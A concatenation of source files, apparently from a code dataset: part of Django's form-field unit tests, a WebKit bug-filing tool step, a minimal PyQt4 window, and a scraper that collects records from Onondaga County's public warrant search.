f = TypedChoiceField(choices=[(1, "1"), (2, "2")], coerce=coerce_func, required=True)
self.assertEqual(Decimal('1.2'), f.clean('2'))
self.assertRaisesMessage(
ValidationError, "'This field is required.'",
f.clean, ''
)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, '3'
)
# NullBooleanField ############################################################
def test_nullbooleanfield_1(self):
f = NullBooleanField()
self.assertIsNone(f.clean(''))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertIsNone(f.clean(None))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('1'))
self.assertIsNone(f.clean('2'))
self.assertIsNone(f.clean('3'))
self.assertIsNone(f.clean('hello'))
self.assertEqual(True, f.clean('true'))
self.assertEqual(False, f.clean('false'))
def test_nullbooleanfield_2(self):
# Make sure that the internal value is preserved if using HiddenInput (#7753)
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm()
self.assertHTMLEqual(
'<input type="hidden" name="hidden_nullbool1" value="True" id="id_hidden_nullbool1" />'
'<input type="hidden" name="hidden_nullbool2" value="False" id="id_hidden_nullbool2" />',
str(f)
)
def test_nullbooleanfield_3(self):
class HiddenNullBooleanForm(Form):
hidden_nullbool1 = NullBooleanField(widget=HiddenInput, initial=True)
hidden_nullbool2 = NullBooleanField(widget=HiddenInput, initial=False)
f = HiddenNullBooleanForm({'hidden_nullbool1': 'True', 'hidden_nullbool2': 'False'})
self.assertIsNone(f.full_clean())
self.assertEqual(True, f.cleaned_data['hidden_nullbool1'])
self.assertEqual(False, f.cleaned_data['hidden_nullbool2'])
def test_nullbooleanfield_4(self):
# Make sure we're compatible with MySQL, which uses 0 and 1 for its boolean
# values. (#9609)
NULLBOOL_CHOICES = (('1', 'Yes'), ('0', 'No'), ('', 'Unknown'))
class MySQLNullBooleanForm(Form):
nullbool0 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool1 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
nullbool2 = NullBooleanField(widget=RadioSelect(choices=NULLBOOL_CHOICES))
f = MySQLNullBooleanForm({'nullbool0': '1', 'nullbool1': '0', 'nullbool2': ''})
self.assertIsNone(f.full_clean())
self.assertEqual(True, f.cleaned_data['nullbool0'])
self.assertEqual(False, f.cleaned_data['nullbool1'])
self.assertIsNone(f.cleaned_data['nullbool2'])
def test_nullbooleanfield_changed(self):
f = NullBooleanField()
self.assertTrue(f.has_changed(False, None))
self.assertTrue(f.has_changed(None, False))
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed(False, False))
self.assertTrue(f.has_changed(True, False))
self.assertTrue(f.has_changed(True, None))
self.assertTrue(f.has_changed(True, False))
# MultipleChoiceField #########################################################
def test_multiplechoicefield_1(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ())
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, ['3']
)
def test_multiplechoicefield_2(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual([], f.clean(''))
self.assertEqual([], f.clean(None))
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '2'], f.clean(['1', '2']))
self.assertEqual(['1', '2'], f.clean([1, '2']))
self.assertEqual(['1', '2'], f.clean((1, '2')))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
self.assertEqual([], f.clean([]))
self.assertEqual([], f.clean(()))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 3 is not one of the available choices.'",
f.clean, ['3']
)
def test_multiplechoicefield_3(self):
f = MultipleChoiceField(
choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3', 'A'), ('4', 'B'))), ('5', 'Other')]
)
self.assertEqual(['1'], f.clean([1]))
self.assertEqual(['1'], f.clean(['1']))
self.assertEqual(['1', '5'], f.clean([1, 5]))
self.assertEqual(['1', '5'], f.clean([1, '5']))
self.assertEqual(['1', '5'], f.clean(['1', 5]))
self.assertEqual(['1', '5'], f.clean(['1', '5']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, ['6']
)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 6 is not one of the available choices.'",
f.clean, ['1', '6']
)
def test_multiplechoicefield_changed(self):
f = MultipleChoiceField(choices=[('1', 'One'), ('2', 'Two'), ('3', 'Three')])
self.assertFalse(f.has_changed(None, None))
self.assertFalse(f.has_changed([], None))
self.assertTrue(f.has_changed(None, ['1']))
self.assertFalse(f.has_changed([1, 2], ['1', '2']))
self.assertFalse(f.has_changed([2, 1], ['1', '2']))
self.assertTrue(f.has_changed([1, 2], ['1']))
self.assertTrue(f.has_changed([1, 2], ['1', '3']))
# TypedMultipleChoiceField ############################################################
# TypedMultipleChoiceField is just like MultipleChoiceField, except that coerced types
# will be returned:
def test_typedmultiplechoicefield_1(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1], f.clean(['1']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, ['2']
)
def test_typedmultiplechoicefield_2(self):
# Different coercion, same validation.
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual([1.0], f.clean(['1']))
def test_typedmultiplechoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual([True], f.clean(['-1']))
def test_typedmultiplechoicefield_4(self):
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual([1, -1], f.clean(['1', '-1']))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. 2 is not one of the available choices.'",
f.clean, ['1', '2']
)
def test_typedmultiplechoicefield_5(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedMultipleChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. B is not one of the available choices.'",
f.clean, ['B']
)
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, [])
def test_typedmultiplechoicefield_6(self):
# Non-required fields aren't required
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual([], f.clean([]))
def test_typedmultiplechoicefield_7(self):
# If you want cleaning an empty value to return a different type, tell the field
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False, empty_value=None)
self.assertIsNone(f.clean([]))
def test_typedmultiplechoicefield_has_changed(self):
# has_changed should not trigger required validation
f = TypedMultipleChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=True)
self.assertFalse(f.has_changed(None, ''))
def test_typedmultiplechoicefield_special_coerce(self):
"""
Test a coerce function which results in a value not present in choices.
Refs #21397.
"""
def coerce_func(val):
return Decimal('1.%s' % val)
f = TypedMultipleChoiceField(
choices=[(1, "1"), (2, "2")], coerce=coerce_func, required=True)
self.assertEqual([Decimal('1.2')], f.clean(['2']))
self.assertRaisesMessage(ValidationError,
"'This field is required.'", f.clean, [])
self.assertRaisesMessage(ValidationError,
"'Select a valid choice. 3 is not one of the available choices.'",
f.clean, ['3'])
# ComboField ##################################################################
def test_combofield_1(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()])
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 28).'",
f.clean, '[email protected]'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_combofield_2(self):
f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
self.assertEqual('[email protected]', f.clean('[email protected]'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 20 characters (it has 28).'",
f.clean, '[email protected]'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'not an email')
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
# FilePathField ###############################################################
def test_filepathfield_1(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
self.assertTrue(fix_os_paths(path).endswith('/django/forms/'))
def test_filepathfield_2(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path)
f.choices = [p for p in f.choices if p[0].endswith('.py')]
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
self.assertRaisesMessage(
ValidationError, "'Select a valid choice. fields.py is not one of the available choices.'",
f.clean, 'fields.py'
)
assert fix_os_paths(f.clean(path + 'fields.py')).endswith('/django/forms/fields.py')
def test_filepathfield_3(self):
path = upath(forms.__file__)
path = os.path.dirname(os.path.abspath(path)) + '/'
f = FilePathField(path=path, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_4(self):
path = os.path.abspath(upath(forms.__file__))
path = os.path.dirname(path) + '/'
f = FilePathField(path=path, recursive=True, match='^.*?\.py$')
f.choices.sort()
expected = [
('/django/forms/__init__.py', '__init__.py'),
('/django/forms/boundfield.py', 'boundfield.py'),
('/django/forms/extras/__init__.py', 'extras/__init__.py'),
('/django/forms/extras/widgets.py', 'extras/widgets.py'),
('/django/forms/fields.py', 'fields.py'),
('/django/forms/forms.py', 'forms.py'),
('/django/forms/formsets.py', 'formsets.py'),
('/django/forms/models.py', 'models.py'),
('/django/forms/utils.py', 'utils.py'),
('/django/forms/widgets.py', 'widgets.py')
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
def test_filepathfield_folders(self):
path = os.path.dirname(upath(__file__)) + '/filepath_test_files/'
f = FilePathField(path=path, allow_folders=True, allow_files=False)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
]
for exp, got in zip(expected, fix_os_paths(f.choices)):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
f = FilePathField(path=path, allow_folders=True, allow_files=True)
f.choices.sort()
expected = [
('/tests/forms_tests/tests/filepath_test_files/.dot-file', '.dot-file'),
('/tests/forms_tests/tests/filepath_test_files/1x1.bmp', '1x1.bmp'),
('/tests/forms_tests/tests/filepath_test_files/1x1.png', '1x1.png'),
('/tests/forms_tests/tests/filepath_test_files/directory', 'directory'),
('/tests/forms_tests/tests/filepath_test_files/fake-image.jpg', 'fake-image.jpg'),
('/tests/forms_tests/tests/filepath_test_files/real-text-file.txt', 'real-text-file.txt'),
]
actual = fix_os_paths(f.choices)
self.assertEqual(len(expected), len(actual))
for exp, got in zip(expected, actual):
self.assertEqual(exp[1], got[1])
self.assertTrue(got[0].endswith(exp[0]))
# SplitDateTimeField ##########################################################
def test_splitdatetimefield_1(self):
from django.forms.widgets import SplitDateTimeWidget
f = SplitDateTimeField()
self.assertIsInstance(f.widget, SplitDateTimeWidget)
self.assertEqual(
datetime.datetime(2006, 1, 10, 7, 30),
f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(
self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'",
f.clean, ['hello', 'there']
)
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
def test_splitdatetimefield_2(self):
f = SplitDateTimeField(required=False)
self.assertEqual(
datetime.datetime(2006, 1, 10, 7, 30),
f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
)
self.assertEqual(datetime.datetime(2006, 1, 10, 7, 30), f.clean(['2006-01-10', '07:30']))
self.assertIsNone(f.clean(None))
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(['']))
self.assertIsNone(f.clean(['', '']))
self.assertRaisesMessage(ValidationError, "'Enter a list of values.'", f.clean, 'hello')
six.assertRaisesRegex(
self, ValidationError, "'Enter a valid date\.', u?'Enter a valid time\.'",
f.clean, ['hello', 'there']
)
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', 'there'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['hello', '07:30'])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10', ''])
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['', '07:30'])
def test_splitdatetimefield_changed(self):
f = SplitDateTimeField(input_date_formats=['%d/%m/%Y'])
self.assertFalse(f.has_changed(['11/01/2012', '09:18:15'], ['11/01/2012', '09:18:15']))
self.assertTrue(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['2008-05-06', '12:40:00']))
self.assertFalse(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:40']))
self.assertTrue(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:41']))
# GenericIPAddressField #######################################################
def test_generic_ipaddress_invalid_arguments(self):
self.assertRaises(ValueError, GenericIPAddressField, protocol="hamster")
self.assertRaises(ValueError, GenericIPAddressField, protocol="ipv4", unpack_ipv4=True)
def test_generic_ipaddress_as_generic(self):
# The edge cases of the IPv6 validation code are not deeply tested
# here, they are covered in the tests for django.utils.ipv6
f = GenericIPAddressField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean(' 127.0.0.1 '), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_as_ipv4_only(self):
f = GenericIPAddressField(protocol="IPv4")
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean(' 127.0.0.1 '), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '256.125.1.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, 'fe80::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '2a02::223:6cff:fe8a:2e8a')
def test_generic_ipaddress_as_ipv6_only(self):
f = GenericIPAddressField(protocol="IPv6")
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_as_generic_not_required(self):
f = GenericIPAddressField(required=False)
self.assertEqual(f.clean(''), '')
self.assertEqual(f.clean(None), '')
self.assertEqual(f.clean('127.0.0.1'), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_normalization(self):
# Test the normalizing code
f = GenericIPAddressField()
self.assertEqual(f.clean(' ::ffff:0a0a:0a0a '), '::ffff:10.10.10.10')
self.assertEqual(f.clean(' ::ffff:10.10.10.10 '), '::ffff:10.10.10.10')
self.assertEqual(f.clean(' 2001:000:a:0000:0:fe:fe:beef '), '2001:0:a::fe:fe:beef')
self.assertEqual(f.clean(' 2001::a:0000:0:fe:fe:beef '), '2001:0:a::fe:fe:beef')
f = GenericIPAddressField(unpack_ipv4=True)
self.assertEqual(f.clean(' ::ffff:0a0a:0a0a'), '10.10.10.10')
# SlugField ###################################################################
def test_slugfield_normalization(self):
f = SlugField()
self.assertEqual(f.clean(' aa-bb-cc '), 'aa-bb-cc')
def test_slugfield_unicode_normalization(self):
f = SlugField(allow_unicode=True)
self.assertEqual(f.clean('a'), 'a')
self.assertEqual(f.clean('1'), '1')
self.assertEqual(f.clean('a1'), 'a1')
self.assertEqual(f.clean('你好'), '你好')
self.assertEqual(f.clean(' 你-好 '), '你-好')
self.assertEqual(f.clean('ıçğüş'), 'ıçğüş')
self.assertEqual(f.clean('foo-ıç-bar'), 'foo-ıç-bar')
# UUIDField ###################################################################
def test_uuidfield_1(self):
field = UUIDField()
value = field.clean('550e8400e29b41d4a716446655440000')
self.assertEqual(value, uuid.UUID('550e8400e29b41d4a716446655440000'))
def test_uuidfield_2(self):
field = UUIDField(required=False)
value = field.clean('')
self.assertEqual(value, None)
def test_uuidfield_3(self):
field = UUIDField()
with self.assertRaises(ValidationError) as cm:
field.clean('550e8400')
self.assertEqual(cm.exception.messages[0], 'Enter a valid UUID.')
def test_uuidfield_4(self):
field = UUIDField()
value = field.prepare_value(uuid.UUID('550e8400e29b41d4a716446655440000'))
self.assertEqual(value, '550e8400e29b41d4a716446655440000')
|
leighpauls/k2cro4 | refs/heads/master | third_party/WebKit/Tools/Scripts/webkitpy/tool/steps/createbug.py | 125 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.steps.abstractstep import AbstractStep
from webkitpy.tool.steps.options import Options
class CreateBug(AbstractStep):
@classmethod
def options(cls):
return AbstractStep.options() + [
Options.cc,
Options.component,
Options.blocks,
]
def run(self, state):
# No need to create a bug if we already have one.
if state.get("bug_id"):
return
cc = self._options.cc
if not cc:
cc = state.get("bug_cc")
blocks = self._options.blocks
if not blocks:
blocks = state.get("bug_blocked")
state["bug_id"] = self._tool.bugs.create_bug(state["bug_title"], state["bug_description"], blocked=blocks, component=self._options.component, cc=cc)
if blocks:
status = self._tool.bugs.fetch_bug(blocks).status()
if status == 'RESOLVED':
self._tool.bugs.reopen_bug(blocks, "Re-opened since this is blocked by bug %s" % state["bug_id"])
|
shinichiba/YamadaLabSkinFrictionR7 | refs/heads/master | mainpyqt4uic.py | 1 | import sys
from PyQt4 import QtGui, uic
class MyWindow(QtGui.QMainWindow):
### functions for the buttons to call
def pressedOnButton(self):
print ("Pressed On!")
def pressedOffButton(self):
print ("Pressed Off!")
def __init__(self):
super(MyWindow, self).__init__()
uic.loadUi('mainwindow.ui', self)
self.pushButtonOn.clicked.connect(lambda: self.pressedOnButton())
self.pushButtonOff.clicked.connect(lambda: self.pressedOffButton())
self.show()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = MyWindow()
sys.exit(app.exec_())
|
rchacon/scofflaw | refs/heads/dev | scrapers/onondaga.py | 1 | """
Scrape Onondaga County warrants.
$ python onondaga.py
"""
import re
from bs4 import BeautifulSoup
import requests
from . import BaseScraper
__county__ = 'onondaga'
__scraper__ = 'OnondagaScraper'
BASE_URL = 'http://psi2.ongov.net'
class OnondagaScraper(BaseScraper):
"""Search for warrants in Onondaga County."""
def __init__(self):
"""Initial shared session with cookies."""
self.session = requests.Session()
# Set cookies
url = '{}/AWarrants/app/index.jsp'.format(BASE_URL)
self.session.get(url)
def has_next(self, markup):
m = re.search(r'Page\s(?P<beginning>\d+)\sof\s(?P<end>\d+)', markup)
if not m:
return False
return int(m.group('beginning')) < int(m.group('end'))
def get_list_markup(self, lastname):
"""Get markup with a list of people with warrants."""
data = {
'form1:lastNameInput': lastname,
'form1:button1': 'Submit',
'form1': 'form1'
}
url = '{}/AWarrants/app/index.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
raise Exception('oops')
def get_next_list_markup(self, next_page):
data = {
'formWarrantRl:table1:web1__pagerWeb': next_page,
'formWarrantRl:table1:goto1__pagerGoText': next_page,
'formWarrantRl': 'formWarrantRl'
}
url = '{}/AWarrants/app/warrants/awarrantsRl.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
raise Exception('oops')
def get_detail_markup(self, link_target):
"""Get detail markup for an individual with a warrant."""
data = {
'formWarrantRl': 'formWarrantRl',
'__LINK_TARGET__': link_target
}
url = '{}/AWarrants/app/warrants/awarrantsRl.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
raise Exception('oops')
def process_details(self, markup):
"""Process detail markup for an individual."""
soup = BeautifulSoup(markup, 'lxml')
mug_shot = soup.find('img', {'id': 'form1:imageEx1'})
ths = soup.find_all('th', {'valign': 'top'})
for th in ths:
# Find Charges
if th.text == 'Charge(s)':
charges_id = int(th.find_next('span').get('id').split(':')[-1][4:]) + 1
charge_span = soup.find('span', {'id': 'form1:table1:0:text%s' % charges_id})
offense_span = charge_span.find_next('span')
null_span = offense_span.find_next('span')
issued_span = null_span.find_next('span')
court_span = issued_span.find_next('span')
court_building = court_span.find_next('span')
court_table = court_span.find_next('table')
court_addr = court_table.text.replace('\n', '')
phone_match = re.search(r'Phone:\((?P<area>\d{3})\)\s+(?P<prefix>\d{3})-(?P<number>\d{4})', court_addr)
if phone_match:
phone = '{area}-{prefix}-{number}'.format(
area=phone_match.group('area'),
prefix=phone_match.group('prefix'),
number=phone_match.group('number')
)
else:
phone = ''
fax_match = re.search(r'Fax:\((?P<area>\d{3})\)\s+(?P<prefix>\d{3})-(?P<number>\d{4})', court_addr)
if fax_match:
fax = '{area}-{prefix}-{number}'.format(
area=fax_match.group('area'),
prefix=fax_match.group('prefix'),
number=fax_match.group('number')
)
else:
fax = ''
agency_span = court_table.find_next('td', {'valign': 'top'}).find_next('span')
return {
'mugshot': '{}{}'.format(BASE_URL, mug_shot['src']),
'charge': charge_span.text,
'offense': offense_span.text,
'issued': issued_span.text,
'court': {
'name': court_span.text,
'address': court_building.text + ' ' + court_addr[0:court_addr.index('Phone')],
'phone': phone,
'fax': fax
},
'agency': agency_span.text.strip()
}
def process_list(self, markup):
"""Process markup that contains list of people."""
soup = BeautifulSoup(markup, 'lxml')
regex = re.compile('formWarrantRl:table1:[0-9]+:backgroundCheckLnk')
backgroundcheck_links = soup.findAll('a', {'id': regex})
if len(backgroundcheck_links) == 0:
raise Exception('Invalid Markup: {}'.format(markup))
for link in backgroundcheck_links:
surname_span = link.find_next('span')
fname_span = surname_span.find_next('span')
mname_span = fname_span.find_next('span')
detail_markup = self.get_detail_markup(link['id'])
last_name = surname_span.text.strip().replace(',', '')
first_name = fname_span.text.strip()
middle_name = mname_span.text.strip()
name = '{first} {last}'.format(first=first_name, last=last_name)
